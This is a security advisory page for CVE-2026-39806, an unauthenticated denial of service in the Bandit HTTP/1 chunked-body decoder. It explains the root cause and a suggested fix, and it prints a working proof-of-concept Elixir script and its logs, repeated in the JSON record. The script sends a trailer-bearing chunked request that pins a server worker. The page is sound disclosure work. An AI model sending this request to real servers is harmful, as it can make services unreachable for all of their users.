      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
    }
  ],
  "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-835"
        }
      ],
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "type": "Secondary"
    }
  ]
}

GHSA-RF5Q-VWXW-GMRF

Vulnerability from github – Published: 2026-05-19 19:25 – Updated: 2026-05-19 19:25

Summary

Bandit: Unauthenticated DoS via chunked request trailers in Bandit HTTP/1 decoder

Details

Summary

A worker-pinning denial of service in Bandit's HTTP/1 chunked transfer decoder. Any unauthenticated client that sends a Transfer-Encoding: chunked request whose body ends with a trailer field (RFC 9112 §7.1.2 explicitly permits this) causes the connection's worker process to spin forever in an infinite recursion. A handful of concurrent connections are sufficient to exhaust the listener pool and render the server unresponsive to all further traffic.

The vulnerability was likely introduced with this commit on Dec 6, 2024: https://github.com/mtrudel/bandit/commit/e73e379ab59840e8561b5730878f16e29ab06217

Details

The bug is in lib/bandit/http1/socket.ex in do_read_chunked_data!/5 (around lines 242–274). The terminator clause matches only ["0", "\r\n" <> rest] — i.e. the last-chunk line 0\r\n followed immediately by the empty trailer line. RFC 9112 §7.1.2 allows zero or more trailer fields between 0\r\n and the final \r\n, e.g. a body ending 0\r\nX-T: v\r\n\r\n.

When trailers are present, :binary.split/2 returns ["0", "X-T: v\r\n\r\n"]. The terminator clause does not match. The inner <<_::binary-size(0), ?\r, ?\n, _::binary>> pattern also does not match because rest starts with X. Execution falls into the _ -> arm, which computes to_read = 0 - byte_size(rest) (a negative number) and calls read_available!/2 on the socket. On timeout, read_available!/2 returns <<>>, leaving the buffer unchanged. do_read_chunked_data!/5 then tail-recurses with the same state and makes no forward progress. The worker is pinned for the lifetime of the TCP connection.

The same shape applies to malformed chunk frames where the declared chunk-size disagrees with the actual data length: the binary-size pattern cannot match and read_available! is repeatedly called with no progress.

The gap is acknowledged in the source itself — the comment on line 245 reads: "We should be reading (and ignoring) trailers here".

Suggested fix: after the 0 size line, consume bytes up to \r\n\r\n (parsing/discarding trailers via :erlang.decode_packet(:httph_bin, …)) before returning. Additionally, ensure every recursive arm makes forward progress — when read_available!/2 returns <<>>, raise request_error!(:request_timeout) rather than re-entering with an unchanged buffer.

PoC

A self-contained reproduction script is available below. It starts Bandit 1.10 on 127.0.0.1:4321 with a trivial echo Plug, opens a TCP connection, and sends a single chunked POST whose body is:

one 5-byte chunk "hello"
the last-chunk marker 0\r\n
one trailer field X-Trailer: 1\r\n
the terminating \r\n

The request is fully RFC-conformant; many fronting proxies (NGINX, HAProxy) emit this exact shape when forwarding trailer-bearing requests. A correct server responds within milliseconds. With the bug, :gen_tcp.recv/3 times out after 10 seconds because the worker is stuck spinning in do_read_chunked_data!/5.

Steps to reproduce: 1. elixir script.exs 2. Observe the TIMEOUT — worker is pinned in do_read_chunked_data!/5 log line. 3. Each additional concurrent client sending the same request consumes one more worker process.

Impact

Unauthenticated denial of service against any Bandit-fronted HTTP/1 service that accepts chunked request bodies — the default for Phoenix and Plug applications. No authentication, no special headers, and no large payload are required; a small number of attacker-controlled connections is enough to exhaust the worker pool and make the server unreachable for all users. Servers sitting behind proxies that legitimately forward trailer-bearing requests can also be affected without any malicious client involvement.

Script and Logs

# Bandit HTTP/1 chunked decoder hangs on requests with trailer headers.
#
# lib/bandit/http1/socket.ex:242-274 (do_read_chunked_data!/5) terminates
# only when the last-chunk line `0\r\n` is followed *immediately* by the
# empty trailer line `\r\n`. RFC 9112 §7.1.2 allows trailer fields between
# them (e.g. `0\r\nX-T: v\r\n\r\n`). With trailers present, none of the
# match clauses fit: the `_` arm computes `to_read = 0 - byte_size(rest)`
# (negative), calls read_available!/2, gets <<>> on timeout, and recurses
# with the same buffer forever — pinning the worker for the connection's
# lifetime. The line 245 comment ("We should be reading (and ignoring)
# trailers here") acknowledges the gap.
#
# This script starts Bandit 1.10 on 127.0.0.1:4321, sends one chunked POST
# whose body ends with a single trailer field, and waits for a response.
# A correct server replies in milliseconds; the buggy decoder never does.
#
# Run: elixir script.exs

Mix.install([
  {:bandit, "~> 1.10"},
  {:plug, "~> 1.19"}
])

defmodule EchoApp do
  @behaviour Plug
  def init(opts), do: opts

  def call(conn, _opts) do
    {:ok, body, conn} = Plug.Conn.read_body(conn)
    Plug.Conn.send_resp(conn, 200, "got #{byte_size(body)} bytes")
  end
end

defmodule TrailerHang do
  @port 4321
  @recv_timeout_ms 10_000

  def run do
    {:ok, _} = Bandit.start_link(plug: EchoApp, ip: {127, 0, 0, 1}, port: @port)

    {:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])

    request = build_chunked_request_with_trailer()
    log("Sending chunked POST whose body ends with `0\\r\\nX-Trailer: 1\\r\\n\\r\\n`.")
    :ok = :gen_tcp.send(sock, request)

    log("Waiting up to #{div(@recv_timeout_ms, 1000)}s for a response (a correct server replies in ms)…")
    started_at = System.monotonic_time(:millisecond)

    case :gen_tcp.recv(sock, 0, @recv_timeout_ms) do
      {:ok, response} ->
        elapsed = System.monotonic_time(:millisecond) - started_at
        log("Got response after #{elapsed}ms — server handles trailers correctly:")
        IO.puts(binary_part(response, 0, min(byte_size(response), 256)))

      {:error, :timeout} ->
        log("TIMEOUT — worker is pinned in do_read_chunked_data!/5.")
        log("Each concurrent client sending this shape consumes one Bandit worker.")

      {:error, reason} ->
        log("Connection error: #{inspect(reason)}")
    end

    :gen_tcp.close(sock)
  end

  # Body: one 5-byte chunk "hello", last-chunk marker `0\r\n`, one trailer
  # `X-Trailer: 1\r\n`, terminating `\r\n`. RFC-conformant; many proxies
  # (NGINX, HAProxy) emit this shape when forwarding trailer-bearing
  # responses or requests.
  defp build_chunked_request_with_trailer do
    "POST / HTTP/1.1\r\n" <>
      "Host: 127.0.0.1:#{@port}\r\n" <>
      "Transfer-Encoding: chunked\r\n" <>
      "Trailer: X-Trailer\r\n" <>
      "Content-Type: application/octet-stream\r\n" <>
      "\r\n" <>
      "5\r\nhello\r\n" <>
      "0\r\n" <>
      "X-Trailer: 1\r\n" <>
      "\r\n"
  end

  defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end

TrailerHang.run()

12:36:54.260 [info] Running EchoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[10:36:54.275] Sending chunked POST whose body ends with `0\r\nX-Trailer: 1\r\n\r\n`.
[10:36:54.276] Waiting up to 10s for a response (a correct server replies in ms)…
[10:37:04.276] TIMEOUT — worker is pinned in do_read_chunked_data!/5.
[10:37:04.276] Each concurrent client sending this shape consumes one Bandit worker.

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "bandit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0"
            },
            {
              "fixed": "1.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39806"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T19:25:21Z",
    "nvd_published_at": "2026-05-13T14:17:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA worker-pinning denial of service in Bandit\u0027s HTTP/1 chunked transfer decoder. Any unauthenticated client that sends a `Transfer-Encoding: chunked` request whose body ends with a trailer field (RFC 9112 \u00a77.1.2 explicitly permits this) causes the connection\u0027s worker process to spin forever in an infinite recursion. A handful of concurrent connections are sufficient to exhaust the listener pool and render the server unresponsive to all further traffic.\n\nThe vulnerability was likely introduced with this commit on `Dec 6, 2024`: https://github.com/mtrudel/bandit/commit/e73e379ab59840e8561b5730878f16e29ab06217\n\n### Details\nThe bug is in `lib/bandit/http1/socket.ex` in `do_read_chunked_data!/5` (around lines 242\u2013274). The terminator clause matches only `[\"0\", \"\\r\\n\" \u003c\u003e rest]` \u2014 i.e. the last-chunk line `0\\r\\n` followed *immediately* by the empty trailer line. RFC 9112 \u00a77.1.2 allows zero or more trailer fields between `0\\r\\n` and the final `\\r\\n`, e.g. a body ending `0\\r\\nX-T: v\\r\\n\\r\\n`.\n\nWhen trailers are present, `:binary.split/2` returns `[\"0\", \"X-T: v\\r\\n\\r\\n\"]`. The terminator clause does not match. The inner `\u003c\u003c_::binary-size(0), ?\\r, ?\\n, _::binary\u003e\u003e` pattern also does not match because `rest` starts with `X`. Execution falls into the `_ -\u003e` arm, which computes `to_read = 0 - byte_size(rest)` (a negative number) and calls `read_available!/2` on the socket. On timeout, `read_available!/2` returns `\u003c\u003c\u003e\u003e`, leaving the buffer unchanged. `do_read_chunked_data!/5` then tail-recurses with the same state and makes no forward progress. The worker is pinned for the lifetime of the TCP connection.\n\nThe same shape applies to malformed chunk frames where the declared chunk-size disagrees with the actual data length: the binary-size pattern cannot match and `read_available!` is repeatedly called with no progress.\n\nThe gap is acknowledged in the source itself \u2014 the comment on line 245 reads: *\"We should be reading (and ignoring) trailers here\"*.\n\n**Suggested fix:** after the `0` size line, consume bytes up to `\\r\\n\\r\\n` (parsing/discarding trailers via `:erlang.decode_packet(:httph_bin, \u2026)`) before returning. Additionally, ensure every recursive arm makes forward progress \u2014 when `read_available!/2` returns `\u003c\u003c\u003e\u003e`, raise `request_error!(:request_timeout)` rather than re-entering with an unchanged buffer.\n\n### PoC\nA self-contained reproduction script is available below. It starts Bandit 1.10 on `127.0.0.1:4321` with a trivial echo Plug, opens a TCP connection, and sends a single chunked POST whose body is:\n\n- one 5-byte chunk `\"hello\"`\n- the last-chunk marker `0\\r\\n`\n- one trailer field `X-Trailer: 1\\r\\n`\n- the terminating `\\r\\n`\n\nThe request is fully RFC-conformant; many fronting proxies (NGINX, HAProxy) emit this exact shape when forwarding trailer-bearing requests. A correct server responds within milliseconds. With the bug, `:gen_tcp.recv/3` times out after 10 seconds because the worker is stuck spinning in `do_read_chunked_data!/5`.\n\nSteps to reproduce:\n1. `elixir script.exs`\n2. Observe the `TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5` log line.\n3. Each additional concurrent client sending the same request consumes one more worker process.\n\n### Impact\nUnauthenticated denial of service against any Bandit-fronted HTTP/1 service that accepts chunked request bodies \u2014 the default for Phoenix and Plug applications. No authentication, no special headers, and no large payload are required; a small number of attacker-controlled connections is enough to exhaust the worker pool and make the server unreachable for all users. Servers sitting behind proxies that legitimately forward trailer-bearing requests can also be affected without any malicious client involvement.\n\n### Script and Logs\n\n```elixir\n# Bandit HTTP/1 chunked decoder hangs on requests with trailer headers.\n#\n# lib/bandit/http1/socket.ex:242-274 (do_read_chunked_data!/5) terminates\n# only when the last-chunk line `0\\r\\n` is followed *immediately* by the\n# empty trailer line `\\r\\n`. RFC 9112 \u00a77.1.2 allows trailer fields between\n# them (e.g. `0\\r\\nX-T: v\\r\\n\\r\\n`). With trailers present, none of the\n# match clauses fit: the `_` arm computes `to_read = 0 - byte_size(rest)`\n# (negative), calls read_available!/2, gets \u003c\u003c\u003e\u003e on timeout, and recurses\n# with the same buffer forever \u2014 pinning the worker for the connection\u0027s\n# lifetime. The line 245 comment (\"We should be reading (and ignoring)\n# trailers here\") acknowledges the gap.\n#\n# This script starts Bandit 1.10 on 127.0.0.1:4321, sends one chunked POST\n# whose body ends with a single trailer field, and waits for a response.\n# A correct server replies in milliseconds; the buggy decoder never does.\n#\n# Run: elixir script.exs\n\nMix.install([\n  {:bandit, \"~\u003e 1.10\"},\n  {:plug, \"~\u003e 1.19\"}\n])\n\ndefmodule EchoApp do\n  @behaviour Plug\n  def init(opts), do: opts\n\n  def call(conn, _opts) do\n    {:ok, body, conn} = Plug.Conn.read_body(conn)\n    Plug.Conn.send_resp(conn, 200, \"got #{byte_size(body)} bytes\")\n  end\nend\n\ndefmodule TrailerHang do\n  @port 4321\n  @recv_timeout_ms 10_000\n\n  def run do\n    {:ok, _} = Bandit.start_link(plug: EchoApp, ip: {127, 0, 0, 1}, port: @port)\n\n    {:ok, sock} = :gen_tcp.connect(~c\"127.0.0.1\", @port, [:binary, active: false])\n\n    request = build_chunked_request_with_trailer()\n    log(\"Sending chunked POST whose body ends with `0\\\\r\\\\nX-Trailer: 1\\\\r\\\\n\\\\r\\\\n`.\")\n    :ok = :gen_tcp.send(sock, request)\n\n    log(\"Waiting up to #{div(@recv_timeout_ms, 1000)}s for a response (a correct server replies in ms)\u2026\")\n    started_at = System.monotonic_time(:millisecond)\n\n    case :gen_tcp.recv(sock, 0, @recv_timeout_ms) do\n      {:ok, response} -\u003e\n        elapsed = System.monotonic_time(:millisecond) - started_at\n        log(\"Got response after #{elapsed}ms \u2014 server handles trailers correctly:\")\n        IO.puts(binary_part(response, 0, min(byte_size(response), 256)))\n\n      {:error, :timeout} -\u003e\n        log(\"TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5.\")\n        log(\"Each concurrent client sending this shape consumes one Bandit worker.\")\n\n      {:error, reason} -\u003e\n        log(\"Connection error: #{inspect(reason)}\")\n    end\n\n    :gen_tcp.close(sock)\n  end\n\n  # Body: one 5-byte chunk \"hello\", last-chunk marker `0\\r\\n`, one trailer\n  # `X-Trailer: 1\\r\\n`, terminating `\\r\\n`. RFC-conformant; many proxies\n  # (NGINX, HAProxy) emit this shape when forwarding trailer-bearing\n  # responses or requests.\n  defp build_chunked_request_with_trailer do\n    \"POST / HTTP/1.1\\r\\n\" \u003c\u003e\n      \"Host: 127.0.0.1:#{@port}\\r\\n\" \u003c\u003e\n      \"Transfer-Encoding: chunked\\r\\n\" \u003c\u003e\n      \"Trailer: X-Trailer\\r\\n\" \u003c\u003e\n      \"Content-Type: application/octet-stream\\r\\n\" \u003c\u003e\n      \"\\r\\n\" \u003c\u003e\n      \"5\\r\\nhello\\r\\n\" \u003c\u003e\n      \"0\\r\\n\" \u003c\u003e\n      \"X-Trailer: 1\\r\\n\" \u003c\u003e\n      \"\\r\\n\"\n  end\n\n  defp log(message), do: IO.puts(\"[#{Time.utc_now() |\u003e Time.truncate(:millisecond)}] #{message}\")\nend\n\nTrailerHang.run()\n```\n\n```logs\n12:36:54.260 [info] Running EchoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)\n[10:36:54.275] Sending chunked POST whose body ends with `0\\r\\nX-Trailer: 1\\r\\n\\r\\n`.\n[10:36:54.276] Waiting up to 10s for a response (a correct server replies in ms)\u2026\n[10:37:04.276] TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5.\n[10:37:04.276] Each concurrent client sending this shape consumes one Bandit worker.\n```",
  "id": "GHSA-rf5q-vwxw-gmrf",
  "modified": "2026-05-19T19:25:21Z",
  "published": "2026-05-19T19:25:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39806"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-39806.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mtrudel/bandit"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bandit: Unauthenticated DoS via chunked request trailers in Bandit HTTP/1 decoder"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39806 (GCVE-0-2026-39806)

FKIE_CVE-2026-39806

GHSA-RF5Q-VWXW-GMRF

Summary

Details

PoC

Impact

Script and Logs

Tags

Sightings

Nomenclature